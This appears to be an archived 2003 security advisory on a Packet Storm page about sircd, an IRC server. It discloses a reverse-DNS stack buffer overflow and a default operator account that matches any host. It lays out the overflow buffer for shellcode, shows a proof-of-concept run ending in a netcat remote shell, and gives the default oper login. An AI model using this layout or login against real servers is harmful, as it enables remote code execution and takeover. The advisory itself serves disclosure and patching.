exploit the possibilities

sircd.txt

sircd.txt
Posted Feb 24, 2003
Authored by Knud Erik Hojgaard | Site kokanins.homepage.dk

Sircd v0.4.0 and below and v0.4.4 from CVS before 04/02-03 contains buffer overflow vulnerabilities which allow remote users to execute arbitrary code. Exploit available here.

tags | advisory, remote, overflow, arbitrary, vulnerability
SHA-256 | e6cd4e6b3ed5a50f2058983327655cd6782b4cf9f1554404cf8127b30d18f04c

sircd.txt

Change Mirror Download
I. BACKGROUND

According to the vendor "The 'sircd' project started as an idea from
the QuakeNet IRC Network coding team to develop a completely new irc
server that had none of the problems of the original ircd, such as
instability, scalability issues, redundant, badly written code and
other nasty things. "
More info is available at http://www.sircd.org.

II. DESCRIPTION

a: Insufficient bounds checking leads to execution of arbitrary code.
b: Default oper account matching *!*@*

III. ANALYSIS

a:
Upon checking the reverse dns of a connecting user, if the returned
value is longer than a certain length a classic stack overflow occurs.

The buffer may be constructed as such:
[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
leaving us with plenty of space both before and after eip to store our
shellcode.

The accompanying .sh script is a silly proof of concept.
Below is a fabricated copy of a typical run:

[shell 1]
$ nc -l -v -p 10000
listening on [any] 10000 ...

[shell 2]
# ./sircd.sh 127.0.0.1

sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>

UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
asd
Game over man, game over
#

[shell 3]
$ sircd &
[1] 75711
$

=====================================
sircd: v0.4.0 Alpha
Author(s)
Zarjazz (zarjazz@barrysworld.com)
=====================================
sircd initialized
SSL initialized

$ BitchX 127.0.0.1
[snip some bitchx output]
[fi] *** Welcome to the_server
[fi] *** Resolving IP 127.0.0.1
--from here on the connection freezes.

[shell 2]
fah
Game over man, game over
#

[shell 1]
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
id
uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)

b: type /oper bod bod bod in a connected irc-client.

IV. DETECTION

sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found
to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03.

V. WORKAROUND

The fix has been incorporated in the CVS tree as per 04/02-03.

VI. VENDOR FIX

Same as above.

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
04/02-02 zarjazz@barrysworld.com responded with a fix.
04/02-02 public disclosure.

IX. CREDIT

Knud Erik Højgaard
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    19 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close